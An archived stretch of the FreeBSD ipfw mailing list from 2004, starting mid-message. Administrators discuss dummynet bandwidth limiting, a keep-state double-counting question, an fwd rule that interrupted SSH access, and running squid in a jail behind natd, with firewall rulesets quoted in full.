5ms 28kbits/s mask dst-ip > 0xffffffff > add pipe 1 ip from any to any out in recv rl1 > > and > > add queue 1 ip from any to 10.0.0.1/16 out in recv > rl1 > queue 1 config weight 3 pipe 1 mask dst-ip > 0x000000ff > pipe 1 config bw 28kbits/s > > I need to know how to configure the bw in the > conditions above... > > Regards, ===== Lucian Lungu Timisoara, Romania 0722408353 From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 13:12:15 2004 Return-Path: Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 827A916A4CE for ; Wed, 14 Apr 2004 13:12:15 -0700 (PDT) Received: from c3p0.reverse.net (c3p0.reverse.net [66.225.200.4]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4DF2943D45 for ; Wed, 14 Apr 2004 13:12:15 -0700 (PDT) (envelope-from mcgehrin@reverse.net) Received: from localhost (mx1.reverse.net [66.225.200.254]) by c3p0.reverse.net (Postfix) with ESMTP id B77A2801 for ; Wed, 14 Apr 2004 16:12:12 -0400 (EDT) Received: by localhost (Postfix, from userid 1012) id A03075E64; Wed, 14 Apr 2004 16:12:12 -0400 (EDT) Received: from orange (unknown [192.168.0.175]) by localhost (Postfix) with SMTP id B14015E45 for ; Wed, 14 Apr 2004 16:12:11 -0400 (EDT) Message-ID: <001a01c4225c$c54d2740$af00a8c0@orange> From: "Matthew McGehrin" To: References: <200404141513.i3EFDR5R084225@lk106.tempest.sk> Date: Wed, 14 Apr 2004 16:12:11 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1409 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409 X-Spam-Checker-Version: SpamAssassin 2.63 (2004-01-11) X-Spam-Status: No, hits=-4.0 required=4.0 tests=BAYES_00 autolearn=ham version=2.63 X-Spam-Level: Subject: Re: limiting bandwith X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 14 Apr 2004 20:12:15 -0000 Wouldn't it just make better sense to do the following: ipfw add 10 pipe 10 tcp from A to B 25 ipfw pipe 10 config bw 256k queue 8k mask dst-ip 0xff000000 ipfw add 1000 pass tcp from A to B 25 setup -- Matthew ----- Original Message ----- From: "Ludo Koren" To: Cc: ; Sent: Wednesday, April 14, 2004 11:13 AM Subject: Re: limiting bandwith > ipfw add queue 3 tcp from A to B 25 > ipfw queue 3 config weight 1 pipe 10 mask src-ip 0x000000ff > ipfw pipe 10 config bw 256Kbit/s From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 13:19:27 2004 Return-Path: Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 59E9B16A4CE for ; Wed, 14 Apr 2004 13:19:27 -0700 (PDT) Received: from mailgw.dgrp.sk (mailgw.dgrp.sk [195.28.127.4]) by mx1.FreeBSD.org (Postfix) with ESMTP id 21E6243D41 for ; Wed, 14 Apr 2004 13:19:26 -0700 (PDT) (envelope-from koren@tempest.sk) Received: by mailgw.dgrp.sk (Postfix, from userid 1003) id 0FD854FDA0; Wed, 14 Apr 2004 22:19:25 +0200 (CEST) Received: from domino1.tempest.sk (unknown [195.28.100.38]) by mailgw.dgrp.sk (Postfix) with ESMTP id 9CBB54FD9F; Wed, 14 Apr 2004 22:19:24 +0200 (CEST) Received: from lk106.tempest.sk ([195.28.109.36]) by domino1.tempest.sk (Lotus Domino Release 6.5.1IF1) with ESMTP id 2004041422192291-1370 ; Wed, 14 Apr 2004 22:19:22 +0200 Received: from lk106.tempest.sk (localhost [127.0.0.1]) by lk106.tempest.sk (8.12.10/8.12.5) with ESMTP id i3EKJFBp081501; Wed, 14 Apr 2004 22:19:15 +0200 (CEST) (envelope-from koren@lk106.tempest.sk) Received: (from koren@localhost) by lk106.tempest.sk (8.12.10/8.12.10/Submit) id i3EKJEmT081498; Wed, 14 Apr 2004 22:19:14 +0200 (CEST) (envelope-from koren) Date: Wed, 14 Apr 2004 22:19:14 +0200 (CEST) Message-Id: <200404142019.i3EKJEmT081498@lk106.tempest.sk> From: Ludo Koren To: tscrum@aaawebsolution.com In-reply-to: <001201c4223f$ad443930$6466a8c0@wolf> (tscrum@aaawebsolution.com) X-MIMETrack: Itemize by SMTP Server on Domino1/DGRP(Release 6.5.1IF1|March 16, 2004) at 14.04.2004 22:19:23,at 14.04.2004 22:19:24, Serialize complete at 14.04.2004 22:19:24 X-Spam-Checker-Version: SpamAssassin 2.61 (1.212.2.1-2003-12-09-exp) on mailgw X-Spam-Status: No, hits=0.0 required=5.0 tests=none autolearn=no version=2.61 X-Spam-Level: cc: ipfw@freebsd.org Subject: Re: limiting bandwith X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 14 Apr 2004 20:19:27 -0000 > Using keep-state "is" the most efficient way to do it. The > config that I sent would still allow smtp and pop through, but > limited as to the weight of the queue. Maybe I am > misunderstanding what you are saying. > Are you saying that the mail is traversing unabated by the > ruleset? No. It seems, when I am using the rule with keep-state flag, each packet is counted twice. So if I set bw to 256Kbit/s, I get only 128Kbit/s. Luigi wrote, in keep-state rules there are not valid in, out, xmit, rule flags, if I understood him correctly... Regards, lk From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 13:38:30 2004 Return-Path: Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A964D16A4CE for ; Wed, 14 Apr 2004 13:38:30 -0700 (PDT) Received: from xorpc.icir.org (xorpc.icir.org [192.150.187.68]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9B50A43D39 for ; Wed, 14 Apr 2004 13:38:30 -0700 (PDT) (envelope-from rizzo@icir.org) Received: from xorpc.icir.org (localhost [127.0.0.1]) by xorpc.icir.org (8.12.9p1/8.12.8) with ESMTP id i3EKcSgd016118; Wed, 14 Apr 2004 13:38:28 -0700 (PDT) (envelope-from rizzo@xorpc.icir.org) Received: (from rizzo@localhost) by xorpc.icir.org (8.12.9p1/8.12.3/Submit) id i3EKcS0E016117; Wed, 14 Apr 2004 13:38:28 -0700 (PDT) (envelope-from rizzo) Date: Wed, 14 Apr 2004 13:38:28 -0700 From: Luigi Rizzo To: Ludo Koren Message-ID: <20040414133828.A16025@xorpc.icir.org> References: <001201c4223f$ad443930$6466a8c0@wolf> <200404142019.i3EKJEmT081498@lk106.tempest.sk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200404142019.i3EKJEmT081498@lk106.tempest.sk>; from lk@tempest.sk on Wed, Apr 14, 2004 at 10:19:14PM +0200 cc: ipfw@freebsd.org cc: tscrum@aaawebsolution.com Subject: Re: limiting bandwith X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 14 Apr 2004 20:38:30 -0000 On Wed, Apr 14, 2004 at 10:19:14PM +0200, Ludo Koren wrote: > > > > > Using keep-state "is" the most efficient way to do it. The > > config that I sent would still allow smtp and pop through, but > > limited as to the weight of the queue. Maybe I am > > misunderstanding what you are saying. > > > Are you saying that the mail is traversing unabated by the > > ruleset? > > No. It seems, when I am using the rule with keep-state flag, each > packet is counted twice. So if I set bw to 256Kbit/s, I get only > 128Kbit/s. Luigi wrote, in keep-state rules there are not valid in, > out, xmit, rule flags, if I understood him correctly... i said a different thing, please re-read my msg carefully. and i am done with this thread, sorry! luigi From owner-freebsd-ipfw@FreeBSD.ORG Thu Apr 15 06:23:18 2004 Return-Path: Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F2C5B16A4CE for ; Thu, 15 Apr 2004 06:23:17 -0700 (PDT) Received: from mailgw.dgrp.sk (mailgw.dgrp.sk [195.28.127.4]) by mx1.FreeBSD.org (Postfix) with ESMTP id D98DA43D5F for ; Thu, 15 Apr 2004 06:23:13 -0700 (PDT) (envelope-from koren@tempest.sk) Received: by mailgw.dgrp.sk (Postfix, from userid 1003) id 65F654FD9A; Thu, 15 Apr 2004 15:23:12 +0200 (CEST) Received: from domino1.tempest.sk (unknown [195.28.100.38]) by mailgw.dgrp.sk (Postfix) with ESMTP id 1719E4FD8A; Thu, 15 Apr 2004 15:23:12 +0200 (CEST) Received: from lk106.tempest.sk ([195.28.109.36]) by domino1.tempest.sk (Lotus Domino Release 6.5.1IF1) with ESMTP id 2004041515230977-1553 ; Thu, 15 Apr 2004 15:23:09 +0200 Received: from lk106.tempest.sk (localhost [127.0.0.1]) by lk106.tempest.sk (8.12.10/8.12.5) with ESMTP id i3FDN3Bp055670; Thu, 15 Apr 2004 15:23:03 +0200 (CEST) (envelope-from koren@lk106.tempest.sk) Received: (from koren@localhost) by lk106.tempest.sk (8.12.10/8.12.10/Submit) id i3FDMxdc055149; Thu, 15 Apr 2004 15:22:59 +0200 (CEST) (envelope-from koren) Date: Thu, 15 Apr 2004 15:22:59 +0200 (CEST) Message-Id: <200404151322.i3FDMxdc055149@lk106.tempest.sk> From: Ludo Koren To: rizzo@icir.org In-reply-to: <20040414133828.A16025@xorpc.icir.org> (message from Luigi Rizzo on Wed, 14 Apr 2004 13:38:28 -0700) X-MIMETrack: Itemize by SMTP Server on Domino1/DGRP(Release 6.5.1IF1|March 16, 2004) at 15.04.2004 15:23:09,at 15.04.2004 15:23:12, Serialize complete at 15.04.2004 15:23:12 X-Spam-Checker-Version: SpamAssassin 2.61 (1.212.2.1-2003-12-09-exp) on mailgw X-Spam-Status: No, hits=0.0 required=5.0 tests=none autolearn=no version=2.61 X-Spam-Level: cc: ipfw@freebsd.org cc: tscrum@aaawebsolution.com Subject: Re: limiting bandwith X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 15 Apr 2004 13:23:18 -0000 Today I put together correct sequence of rules. So far, it seems to be working correctly. It was my fault. I did some mistake or had incomplete rules. Thanks for your help once again. Regards, lk From owner-freebsd-ipfw@FreeBSD.ORG Thu Apr 15 15:20:26 2004 Return-Path: Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 792E016A4CE for ; Thu, 15 Apr 2004 15:20:26 -0700 (PDT) Received: from telesto.bi.lt (telesto.bi.lt [213.226.153.12]) by mx1.FreeBSD.org (Postfix) with ESMTP id 98EEB43D2F for ; Thu, 15 Apr 2004 15:20:25 -0700 (PDT) (envelope-from hugle@vkt.lt) Received: from calypso.bi.lt (calypso.bi.lt [213.226.153.10]) by telesto.bi.lt (Postfix) with ESMTP id D465D974B9 for ; Fri, 16 Apr 2004 01:20:23 +0300 (EEST) Received: by calypso.bi.lt (Postfix, from userid 506) id 90AB0598044; Fri, 16 Apr 2004 01:20:24 +0300 (EEST) X-Original-To: freebsd-ipfw@freebsd.org Received: from vkt-dell (unknown [213.226.136.201]) by calypso.bi.lt (Postfix) with ESMTP id 60A3D598010 for ; Fri, 16 Apr 2004 01:20:24 +0300 (EEST) Date: Fri, 16 Apr 2004 01:20:29 +0300 From: hugle X-Mailer: The Bat! (v2.01) X-Priority: 3 (Normal) Message-ID: <132203851553.20040416012029@vkt.lt> To: freebsd-ipfw@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Subject: ipfw FWD and NOT ME bug while SSHing ? X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list Reply-To: hugle List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 15 Apr 2004 22:20:26 -0000 Hello all. I've just noticed some problems here.... look : whilee sshing to the server after running such command: bash-2.05b# ipfw add 3032 fwd x.x.x.1 ip from 192.168.0.0/16 to not me && sleep 15 && ipfw delete 3032 & I've got 'disconencted' from ssh for 15 seconds, console hanged up. But I was able to ping the machine BUT I wasn't able to ssh to this machine with its IP 192.168.x.x while sshing to x.x.x.59 to the same machine I've got IN (and after rule automaticaly removed after 15 sec this ocnsole hanged up) And after 15 seconds i was able to INPUT further.. Doesn anyone met this problem before? PS. 03020 5274 4396532 fwd z.z.z.161 ip from 192.168.0.0/16 to not me dst-port 22 command like that didn't take any affect after adding, was able to SSH. -- Best regards,Hugle From owner-freebsd-ipfw@FreeBSD.ORG Thu Apr 15 16:48:19 2004 Return-Path: Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BE1BE16A4CE for ; Thu, 15 Apr 2004 16:48:19 -0700 (PDT) Received: from telesto.bi.lt (telesto.bi.lt [213.226.153.12]) by mx1.FreeBSD.org (Postfix) with ESMTP id 54C1643D53 for ; Thu, 15 Apr 2004 16:48:19 -0700 (PDT) (envelope-from hugle@vkt.lt) Received: from calypso.bi.lt (calypso.bi.lt [213.226.153.10]) by telesto.bi.lt (Postfix) with ESMTP id CD740974B8 for ; Fri, 16 Apr 2004 02:48:17 +0300 (EEST) Received: by calypso.bi.lt (Postfix, from userid 506) id 8F05459802B; Fri, 16 Apr 2004 02:48:19 +0300 (EEST) X-Original-To: freebsd-ipfw@freebsd.org Received: from vkt-dell (unknown [213.226.136.201]) by calypso.bi.lt (Postfix) with ESMTP id 6444C598004 for ; Fri, 16 Apr 2004 02:48:19 +0300 (EEST) Date: Fri, 16 Apr 2004 02:48:22 +0300 From: hugle X-Mailer: The Bat! (v2.01) X-Priority: 3 (Normal) Message-ID: <20209124174.20040416024822@vkt.lt> To: freebsd-ipfw@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Subject: Re: ipfw FWD and NOT ME bug while SSHing ? X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list Reply-To: hugle List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 15 Apr 2004 23:48:19 -0000 h> Hello all. h> I've just noticed some problems here.... look : h> whilee sshing to the server after running such command: h> bash-2.05b# ipfw add 3032 fwd x.x.x.1 ip from 192.168.0.0/16 to h> not me && sleep 15 && ipfw delete 3032 & h> I've got 'disconencted' from ssh for 15 seconds, console hanged up. h> But I was able to ping the machine h> BUT I wasn't able to ssh to this machine with its IP 192.168.x.x while h> sshing to x.x.x.59 to the same machine I've got IN (and after rule h> automaticaly removed after 15 sec this ocnsole hanged up) h> And after 15 seconds i was able to INPUT further.. h> Doesn anyone met this problem before? h> PS. h> 03020 5274 4396532 fwd z.z.z.161 ip from h> 192.168.0.0/16 to not me dst-port 22 h> command like that didn't take any affect after adding, was able to h> SSH. tried also adding such rules: fwd x.x.x.1 ip from 192.168.0.0/16 to not me dst-port 112-442 fwd x.x.x.1 ip from 192.168.0.0/16 to not me dst-port 445-1862 fwd x.x.x.1 ip from 192.168.0.0/16 to not me dst-port 1864-2081 fwd x.x.x.1 ip from 192.168.0.0/16 to not me dst-port 2083-3999 fwd x.x.x.1 ip from 192.168.0.0/16 to not me dst-port 4001-5049 fwd x.x.x.1 ip from 192.168.0.0/16 to not me dst-port 5051-5189 fwd x.x.x.1 ip from 192.168.0.0/16 to not me dst-port 5191-6110 fwd x.x.x.1 ip from 192.168.0.0/16 to not me dst-port 6120-6665 fwd x.x.x.1 ip from 192.168.0.0/16 to not me dst-port 6668-7000 fwd x.x.x.1 ip from 192.168.0.0/16 to not me dst-port 8000-9999 fwd x.x.x.1 ip from 192.168.0.0/16 to not me dst-port 10001-27014 fwd x.x.x.1 ip from 192.168.0.0/16 to not me dst-port 27016-65000 wlso blocked access to SSH. what is the clue ? thanks. From owner-freebsd-ipfw@FreeBSD.ORG Fri Apr 16 14:20:05 2004 Return-Path: Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 222D216A4CE for ; Fri, 16 Apr 2004 14:20:05 -0700 (PDT) Received: from flock1.newmail.ru (morda.newmail.ru [212.48.140.150]) by mx1.FreeBSD.org (Postfix) with SMTP id C041143D48 for ; Fri, 16 Apr 2004 14:20:03 -0700 (PDT) (envelope-from IgorPopov@NewMail.RU) Received: (qmail 3416 invoked from network); 16 Apr 2004 21:14:28 -0000 Received: from unknown (HELO unix.freebsd.ru) (igorpopov.newmail.ru@217.168.68.115) by smtpd.newmail.ru with SMTP; 16 Apr 2004 21:14:28 -0000 Received: from localhost (localhost [127.0.0.1]) by unix.freebsd.ru (8.12.11/8.12.11) with ESMTP id i3H0Kx2L001252 for ; Sat, 17 Apr 2004 00:21:02 GMT (envelope-from IgorPopov@NewMail.RU) From: Igor Popov Organization: Home To: ipfw@freebsd.org Date: Sat, 17 Apr 2004 00:20:59 +0000 User-Agent: KMail/1.6.1 MIME-Version: 1.0 Content-Disposition: inline Message-Id: <200404170020.59722.IgorPopov@NewMail.RU> Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Subject: natd and squid in jail X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 16 Apr 2004 21:20:05 -0000 Hi, I have home network, that consits of two macines, the first one (freebsd) has dialup access to inet. Squid runs on freebsd to allow access to inet from my second machin. For sake of experiment I tried to run squid in jail. But it doesn't work with inet with ipfw and natd, but it works fine with ipfilter and ipnat and OpenBSD's pf. There are my ipfw rules: fwcmd="/sbin/ipfw -q" # Force a flushing of the current rules before we reload. $fwcmd -f flush #automated anti-spoofing $fwcmd add deny log ip from any to any not verrevpath in recv ng0 #natd $fwcmd add divert natd all from any to any via ng0 # Allow all localhost connections $fwcmd add allow all from any to any via lo0 $fwcmd add deny log all from any to 127.0.0.0/8 $fwcmd add deny log all from 127.0.0.0/8 to any # Allow all connections that have dynamic rules built for them, # but deny established connections that don't have a dynamic rule. # See ipfw(8) for details. $fwcmd add check-state $fwcmd add deny tcp from any to any established # Allow all connections from my network card that I initiate $fwcmd add allow tcp from me to any out xmit any setup keep-state $fwcmd add deny tcp from me to any $fwcmd add allow ip from me to any out xmit any keep-state # This sends a RESET to all ident packets. $fwcmd add reset log tcp from any to me 113 in recv any # Enable ICMP $fwcmd add deny log icmp from any to me icmptypes 8,13 $fwcmd add allow icmp from me to any keep-state #enable access for squid via localnet $fwcmd add allow tcp from 192.168.1.0/24 to me dst-port 3128 in recv rl0 setup keep-state # Enable IPSec $fwcmd add allow log udp from any to me src-port isakmp dst-port isakmp via rl0 keep-state $fwcmd add allow esp from any to any via rl0 $fwcmd add allow ah from any to any via rl0 # Deny all the rest. $fwcmd add deny log ip from any to any rl0: 192.168.1.1 mask 0xffffff00, 192.168.1.2 mask 0xffffff80 when I do `ipfw -d show` or `tcpdump - ng0`, I see that squid begins connection and there is a respond, but it can't achieve to squid. -- Ten years of rejection slips is nature's way of telling you to stop writing. -- R. Geis